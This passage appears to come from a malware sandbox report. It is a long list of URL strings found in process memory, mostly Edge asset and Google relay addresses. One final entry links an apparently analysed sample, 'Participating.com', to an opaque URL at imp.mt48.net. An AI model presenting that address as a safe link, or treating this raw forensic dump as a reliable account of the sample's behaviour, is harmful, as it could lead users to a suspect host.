            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.dr, HubApps Icons.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.dr, HubApps Icons.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.dr, HubApps Icons.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.dr, HubApps Icons.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
            Source: 000003.log1.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.dr, HubApps Icons.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.dr, HubApps Icons.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.dr, HubApps Icons.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.dr, HubApps Icons.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
            Source: 000003.log1.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://gaana.com/
            Source: chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2051212256.00006C7802660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
            Source: chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/)
            Source: chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com//
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2000517489.0000474C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2048687585.0000474C00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2000647191.0000474C00728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
            Source: chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/6
            Source: chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/8
            Source: chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/A
            Source: chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/G
            Source: chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/H
            Source: chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/J
            Source: chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/P
            Source: chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/T
            Source: chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/W
            Source: chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/f
            Source: chrome.exe, 00000011.00000003.2051212256.00006C7802660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/lx
            Source: chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/m
            Source: chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/s
            Source: chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/v
            Source: chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2051212256.00006C7802660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2000517489.0000474C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2048687585.0000474C00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2000647191.0000474C00728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
            Source: chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/
            Source: chrome.exe, 00000011.00000003.2001145278.0000474C00878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
            Source: chrome.exe, 00000011.00000003.2000517489.0000474C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2048687585.0000474C00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2000647191.0000474C00728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
            Source: msedge.exe, 00000015.00000002.2202653282.000047B8003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
            Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://img-s-msn-com.akamaized.net/
            Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
            Source: Participating.com, 0000000B.00000002.2647629721.0000000004D2C000.00000004.00000800.00020000.00000000.sdmp, PH4O89.11.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
